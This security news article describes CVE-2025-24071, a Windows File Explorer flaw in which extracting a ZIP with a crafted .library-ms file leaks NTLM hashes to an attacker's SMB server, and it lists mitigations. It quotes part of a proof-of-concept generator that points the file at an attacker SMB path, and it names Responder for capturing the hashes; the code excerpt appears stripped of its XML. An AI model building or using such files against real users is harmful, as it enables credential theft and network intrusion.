Windows 11 File Explorer Vulnerability Enables NTLM Hash Theft

A newly disclosed vulnerability, CVE-2025-24071, has been identified in Windows File Explorer, specifically affecting Windows 11 (23H2) and earlier versions that support .library-ms files and the SMB protocol.

This flaw enables attackers to capture NTLM (New Technology LAN Manager) authentication hashes simply by tricking a user into extracting a malicious ZIP archive—no further interaction is required.

The vulnerability exploits Windows Explorer’s automatic file processing.

When a ZIP or RAR archive containing a specially crafted .library-ms file is extracted, Windows Explorer and the SearchProtocolHost.exe service automatically parse the file to gather metadata.

If the .library-ms file references a remote SMB (Server Message Block) path controlled by the attacker (e.g., \attacker_ipshared), Windows initiates an SMB authentication handshake to that server.

This handshake transmits the victim’s NTLMv2 hash, which can then be intercepted and potentially cracked offline by the attacker.

Technical Terms and Components:

• NTLM Hash: A cryptographic representation of a Windows user’s password, used in challenge-response authentication.
• .library-ms File: An XML-based file type used by Windows to define virtual libraries or collections of folders.
• SMB Protocol: A network file sharing protocol used by Windows for accessing files and printers over a network.
• Information Disclosure: The vulnerability type, that it leaks sensitive authentication data.

Proof of Concept and Attack Code

Security researcher Mohammed Idrees Banyamer published a proof-of-concept (PoC) exploit demonstrating the attack.

The Python script automates the creation of a malicious .library-ms file, embedding a reference to an attacker-controlled SMB server.

The script then packages this file into a ZIP archive.

When a victim extracts the archive, their system automatically attempts to authenticate with the attacker’s SMB server, leaking the NTLM hash.

Key code excerpt:

pythondef create_library_ms(ip: str, filename: str, output_dir: Path) -> Path:
    payload = f'''

  
    
      
        \\{ip}\shared
      
    
  
'''
    output_file = output_dir / f"{filename}.library-ms"
    output_file.write_text(payload, encoding="utf-8")
    return output_file

Attackers can use this script to generate the ZIP file and then distribute it via phishing emails or malicious downloads.

Tools like Responder can be used to listen for and capture the NTLM hashes once the victim extracts the archive.

Real-World Impact, Exploitation, and Mitigation

The vulnerability has been actively exploited in the wild, with campaigns targeting government and private sector organizations.

Attackers have distributed malicious ZIP archives via phishing emails, Dropbox links, and underground forums.

Notably, the threat actor “Krypt0n” has been linked to the development and sale of malware exploiting this flaw.

Risks include:

• Credential theft for pass-the-hash attacks
• Potential for lateral movement within networks
• Offline cracking of NTLM hashes

Microsoft addressed the vulnerability in the March 2025 Patch Tuesday update, urging all users to apply the latest security patches immediately.

Additionally, organizations are advised to restrict or disable NTLM authentication where possible, enable SMB signing, and monitor for suspicious SMB traffic.

Summary Table:

This incident highlights the ongoing risks posed by legacy authentication protocols and underscores the importance of prompt patching and layered security controls in enterprise environments.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!